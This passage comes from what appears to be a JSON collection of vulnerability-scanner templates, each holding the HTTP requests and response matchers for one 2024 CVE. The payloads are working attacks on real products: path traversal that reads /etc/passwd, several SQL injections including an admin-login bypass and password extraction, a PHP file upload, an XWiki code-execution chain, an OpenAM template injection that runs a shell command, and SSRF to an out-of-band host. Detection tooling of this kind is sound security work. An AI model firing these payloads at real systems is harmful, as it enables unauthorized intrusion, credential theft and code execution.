200","contains_all(body,\"msg\\\":\",\"header\\\":\",\"code\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2024-31848","info":{"name":"CData API Server < 23.4.8844 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["<title>CData - API Server</title>"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-20440","info":{"name":"Cisco Smart Licensing Utility UnAuthenticated Logs Exposure Leaking Plaintext Credentials","severity":"high"},"requests":[{"raw":["GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["csluev.log"]},{"type":"word","part":"content_type","words":["text/x-log"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6646","info":{"name":"Netgear-WN604 downloadFile.php -  Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloadFile.php?file=config"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["system:basicSettings","system:staSettings"],"condition":"and"},{"type":"word","part":"content_type","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33288","info":{"name":"Prison Management System - SQL Injection Authentication Bypass","severity":"high"},"requests":[{"raw":["POST /Admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntxtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin=\n","GET /Admin/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<p>Change Password</p>","<p>Logout</p>","Admin Dashboard | Prison Management system"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-41955","info":{"name":"Open Redirect in Login Redirect - MobSF","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /login/?next=//interact.sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header_2","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2024-3850","info":{"name":"Uniview NVR301-04S2-P4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/V1.0%3CsVg/onload=alert.bind%28%29%281%29%3E/Alarm/Exceptions/LinkageActions?="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/V1.0<sVg/onload=alert.bind()(1)>/Alarm/Exceptions/LinkageActions?="],"condition":"and"},{"type":"word","part":"header","words":["NVRDVR"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6205","info":{"name":"PayPlus Payment Gateway < 6.6.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nGET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 302","regex('^-1$', body)","contains(content_type,\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2024-39907","info":{"name":"1Panel SQL Injection - Authenticated","severity":"critical"},"requests":[{"raw":["POST /api/v1/auth/login HTTP/1.1\nHost: {{Hostname}}\nEntranceCode: ZW50cmFuY2U=\nContent-Type: application/json\n\n{\"name\":\"{{username}}\",\"password\":\"{{password}}\",\"ignoreCaptcha\":true,\"authMethod\":\"session\",\"language\":\"en\"}\n","POST /api/v1/hosts/command/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"page\":1,\"pageSize\":10,\"groupID\":0,\"orderBy\":\"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;\",\"order\":\"ascending\",\"name\":\"a\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body_2, \"SQL logic error\",\"table exp already exists\")","contains(header_1, 'psession')"],"condition":"and"}]}]},{"id":"CVE-2024-5522","info":{"name":"WordPress HTML5 Video Player < 2.5.27 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-40348","info":{"name":"Bazarr < 1.4.3 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login"],"matchers":[{"type":"word","part":"body","words":["<title>Bazarr</title>","content=\"Bazarr","window.Bazarr"],"condition":"or","internal":true}]},{"method":"GET","path":["{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1209","info":{"name":"LearnDash LMS < 4.10.2 - Sensitive Information Exposure via assignments","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sfwd-assignment"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","slug\":\"assignment",".pdf\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-41628","info":{"name":"Cluster Control CMON API - Directory Traversal","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"ClusterControl\",\"CMON_API\")","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /../../../../../../../../..//etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0713","info":{"name":"Monitorr Services Configuration - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaquxwjsn\n\n------WebKitFormBoundaryaquxwjsn\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{file}}.php\"\nContent-Type: image/jpeg\n\n{{base64_decode('/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooA//2Tw/cGhwIGVjaG8gJ3h4eHh4eGF0ZmVyc290Zyc7Pz4=')}}\n------WebKitFormBoundaryaquxwjsn--\n"],"matchers":[{"type":"word","part":"body","internal":true,"words":["has been uploaded to:"]}]},{"raw":["GET /assets/data/usrimg/{{file}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["atfersotg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-21650","info":{"name":"XWiki < 4.10.20 - Remote code execution","severity":"critical"},"requests":[{"raw":["GET {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparent=xwiki%3AMain.UserDirectory&register_first_name={{firstname}}&register_last_name={{lastname}}&xwikiname={{user}}&register_password={{pass}}&register2_password={{pass}}&register_email=\"{{randstr}}%40{{rand_base(5)}}.com&xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender&form_token={{token}}\n"],"payloads":{"path":[null,"/xwiki"]},"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration successful","Attack succeeded","Failed to execute the [groovy]"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["data\\-xwiki\\-form\\-token=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2024-4257","info":{"name":"BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection","severity":"medium"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"<title>\u4e34\u5e8a\u6d4f\u89c8</title>\")","contains(header,\"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:6%27-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(header,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-38289","info":{"name":"TurboMeeting - Boolean-based SQL Injection","severity":"critical"},"requests":[{"raw":["POST /as/wapi/vmp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmeeting_id=1'/**/OR/**/1=1/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**\n","POST /as/wapi/vmp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmeeting_id=1'/**/OR/**/1=2/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/**\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["<__Status__>SUCCEED</__Status__>"]},{"type":"word","part":"body_2","words":["<__Status__>FAILED</__Status__>"]}]}]},{"id":"CVE-2024-33575","info":{"name":"User Meta WP Plugin < 3.1 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/user-meta/views/debug.php"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"um-debug<br/>\")"],"condition":"and"}]}]},{"id":"CVE-2024-3552","info":{"name":"Web Directory Free < 1.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["/wp-content/plugins/web-directory-free"],"internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=w2dc_get_map_marker_info&locations_ids[]=(select+if(1=1,sleep(6),0)+from+(select+1)x)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","regex('^\\[\\]$', body)"],"condition":"and"}]}]},{"id":"CVE-2024-7188","info":{"name":"Bylancer Quicklancer 2.4 G - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 30s\nGET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1)%20AND%20(SELECT%201864%20FROM%20(SELECT(SLEEP(6)))gOGh)%20AND%20(6900=6900&salary-type=1&sort=id&subcat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type,\"text/html\")","contains_all(body,\"og:site_name\",\"og:locale\",\"range2\")"],"condition":"and"}]}]},{"id":"CVE-2024-37881","info":{"name":"SiteGuard WP Plugin <= 1.7.6 - Login Page Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/siteguard/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"SiteGuard WP Plugin\")"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-register.php"],"matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2024-41667","info":{"name":"OpenAM<=15.0.3 FreeMarker - Template Injection","severity":"high"},"requests":[{"raw":["POST /openam/json/realms/root/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-API-Version: protocol=1.0,resource=2.1\nX-Password: anonymous\nX-Username: anonymous\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nX-NoSession: true\n"],"matchers":[{"type":"word","part":"body","words":["authId"],"internal":true}],"extractors":[{"type":"regex","name":"authId","part":"body","group":1,"regex":["\"authId\":\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/json/realms/root/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-API-Version: protocol=1.0,resource=2.1\nX-Password: anonymous\nX-Username: anonymous\nContent-Type: application/json\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nX-NoSession: true\n\n{\"authId\":\"{{authId}}\",\"template\":\"\",\"stage\":\"DataStore1\",\"header\":\"Sign in to OpenAM\",\"infoText\":[\"\",\"\"],\"callbacks\":[{\"type\":\"NameCallback\",\"output\":[{\"name\":\"prompt\",\"value\":\"User Name:\"}],\"input\":[{\"name\":\"IDToken1\",\"value\":\"{{username}}\"}]},{\"type\":\"PasswordCallback\",\"output\":[{\"name\":\"prompt\",\"value\":\"Password:\"}],\"input\":[{\"name\":\"IDToken2\",\"value\":\"{{password}}\"}]}]}\n"],"matchers":[{"type":"word","part":"body","words":["tokenId"]}],"extractors":[{"type":"kval","name":"csrf","part":"header","internal":true,"kval":["iPlanetDirectoryPro"]}]},{"raw":["GET /openam/realm/RMRealm?RMRealm.tblDataActionHref=/&requester=XUI HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"pageSession1","part":"body","group":1,"regex":["jato.pageSession=(.*?)\""]}]},{"raw":["GET /openam/agentconfig/Agents?Agents.tabCommon.TabHref=186&jato.pageSession={{pageSession1}}&requester=XUI HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"pageSession2","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/Agents HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\njato.defaultCommand=%2Fg&jato.pageSession={{pageSession2}}\n"],"extractors":[{"type":"regex","name":"pageSession3","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/Agents HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\n&Agents.tfFilter=*&Agents.tblSearch.PrimarySortNameHiddenField=tblDataName&Agents.tblSearch.PrimarySortOrderHiddenField=ascending&Agents.tblSearch.SecondarySortNameHiddenField=&Agents.tblSearch.SecondarySortOrderHiddenField=&Agents.tblSearch.AdvancedSortNameHiddenField=&Agents.tblSearch.AdvancedSortOrderHiddenField=&Agents.tblButtonAdd=New...&Agents.tblButtonDelete.DisabledHiddenField=true&Agents.tblSearch.SelectionCheckbox0.jato_boolean=false&Agents.tblDataUniversalName=id%3Dou%3Dagentonly%2Cdc%3Dopenam%2Cdc%3Dopenidentityplatform%2Cdc%3Dorg&Agents.tfGroupFilter=*&Agents.tblSearchGroup.PrimarySortNameHiddenField=tblDataGroupName&Agents.tblSearchGroup.PrimarySortOrderHiddenField=ascending&Agents.tblSearchGroup.SecondarySortNameHiddenField=&Agents.tblSearchGroup.SecondarySortOrderHiddenField=&Agents.tblSearchGroup.AdvancedSortNameHiddenField=&Agents.tblSearchGroup.AdvancedSortOrderHiddenField=&Agents.tblButtonGroupDelete.DisabledHiddenField=true&jato.defaultCommand=%2FbtnSearch&jato.pageSession={{pageSession3}}\n"],"extractors":[{"type":"regex","name":"pageSession4","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/AgentAdd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\nAgentAdd.button1=Create&AgentAdd.tfName={{randstr}}&AgentAdd.tfPassword=test&AgentAdd.tfPasswordConfirm=test&jato.defaultCommand=%2Fbutton1&jato.pageSession={{pageSession4}}\n"],"extractors":[{"type":"regex","name":"pageSession5","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["GET /openam/agentconfig/Agents?Agents.tblDataActionHref=id%3D{{randstr}}%2Cou%3Dagentonly%2Cdc%3Dopenam%2Cdc%3Dopenidentityplatform%2Cdc%3Dorg&jato.pageSession={{pageSession2}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"pageSession6","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/GenericAgentProfile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\nGenericAgentProfile.button1=+Save+&GenericAgentProfile.agentgroup=&GenericAgentProfile.sunIdentityServerDeviceStatus=Active&GenericAgentProfile.userpassword=&GenericAgentProfile.userpassword_confirm=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientType=Confidential&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.listbox=https%3A%2F%2Fgithub.com&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.deleteButton.DisabledHiddenField=false&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.selectedTextField=https%3A%2F%2Fgithub.com%09https%3A%2F%2Fgithub.com&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.listbox=employeenumber&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.deleteButton.DisabledHiddenField=false&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.selectedTextField=employeenumber%09employeenumber&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.selectedTextField=code%09code%09token%09token%09id_token%09id_token%09code+token%09code+token%09token+id_token%09token+id_token%09code+id_token%09code+id_token%09code+token+id_token%09code+token+id_token&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.tokenEndPointAuthMethod=client_secret_basic&GenericAgentProfile.com.forgerock.openam.oauth2provider.jwksURI=http%3A%2F%2Fkubernetes.docker.internal%3A8081%2Fopenam%2Foauth2%2Fconnect%2Fjwk_uri&GenericAgentProfile.com.forgerock.openam.oauth2provider.jwks=&GenericAgentProfile.com.forgerock.openam.oauth2provider.sectorIdentifierURI=&GenericAgentProfile.com.forgerock.openam.oauth2provider.subjectType=Public&GenericAgentProfile.com.forgerock.openam.oauth2provider.idTokenSignedResponseAlg=HS256&GenericAgentProfile.idTokenEncryptionEnabled.jato_boolean=false&GenericAgentProfile.idTokenEncryptionAlgorithm=RSA1_5&GenericAgentProfile.idTokenEncryptionMethod=A128CBC-HS256&GenericAgentProfile.idTokenPublicEncryptionKey=&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.accessToken=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientSessionURI=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientJwtPublicKey=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultMaxAge=600&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultMaxAgeEnabled.jato_boolean=false&GenericAgentProfile.com.forgerock.openam.oauth2provider.publicKeyLocation=jwks_uri&GenericAgentProfile.com.forgerock.openam.oauth2provider.authorizationCodeLifeTime=0&GenericAgentProfile.com.forgerock.openam.oauth2provider.refreshTokenLifeTime=0&GenericAgentProfile.com.forgerock.openam.oauth2provider.accessTokenLifeTime=0&GenericAgentProfile.com.forgerock.openam.oauth2provider.jwtTokenLifeTime=0&GenericAgentProfile.isConsentImplied.jato_boolean=false&jato.pageSession={{pageSession6}}\n"],"matchers":[{"type":"word","part":"body","words":["<div class=\"AlrtMsgTxt\">Profile was updated.</div>"]}]},{"raw":["POST /openam/json/realms/root/realm-config/services/oauth-oidc?_action=create HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/json\nConnection: keep-alive\n\n{}\n"],"matchers":[{"type":"word","part":"body","words":["message","reason","code"],"condition":"and"}]},{"raw":["PUT /openam/json/realms/root/realm-config/services/oauth-oidc HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/json\n\n{\"advancedOAuth2Config\":{\"customLoginUrlTemplate\":\"<#assign value=\\\"freemarker.template.utility.Execute\\\"?new()>${value(\\\"head -n 1 /etc/passwd\\\")}\"},\"deviceCodeConfig\":{\"completionUrl\":\"\",\"verificationUrl\":\"\",\"devicePollInterval\":5,\"deviceCodeLifetime\":300},\"oidcSsoProviderEnabled\":false,\"_id\":\"\",\"_type\":{\"_id\":\"oauth-oidc\",\"name\":\"OAuth2 Provider\",\"collection\":false}}\n"],"matchers":[{"type":"word","part":"body","words":["advancedOAuth2Config","customLoginUrlTemplate"],"condition":"and"}]},{"raw":["GET /openam/oauth2/realms/root/authorize?client_id={{randstr}}&scope=employeenumber&redirect_uri=https://github.com&response_type=code&csrf={{csrf}}&max_age=200 HTTP/1.1\nHost: {{Hostname}}\n"],"disable-cookie":true,"matchers":[{"type":"dsl","dsl":["contains(urldecode(location),\"root:x:0:0:\")"]}]}]},{"id":"CVE-2024-3495","info":{"name":"Wordpress Country State City Dropdown <=2.7.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=tc_csca_get_cities&nonce_ajax={{nonce}}&sid=1+or+0+union+select+concat(0x64617461626173653a,(select%20md5({{num}})),0x7c76657273696f6e3a,(select%20md5({{num}})),0x7c757365723a,user()),2,3--+-\n"],"matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"nonce\":\"(\\S*)\""],"internal":true}]}]},{"id":"CVE-2024-27564","info":{"name":"ChatGPT\u4e2a\u4eba\u4e13\u7528\u7248 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pictureproxy.php?url=file:///etc/passwd","{{BaseURL}}/pictureproxy.php?url=http://{{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"image/jpeg\")","regex('root:.*:0:0:', body)"],"condition":"and"},{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"image/jpeg\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-1698","info":{"name":"NotificationX <= 2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nPOST /wp-json/notificationx/v1/analytics HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"nx_id\": \"1\",\"type\": \"clicks`=1 and 1=sleep(5)-- -\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"{\\\"success\\\":true}\")","contains(header, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2024-6028","info":{"name":"Quiz Maker <= 6.5.8.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,6,0)]=&action=ays_finish_quiz\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 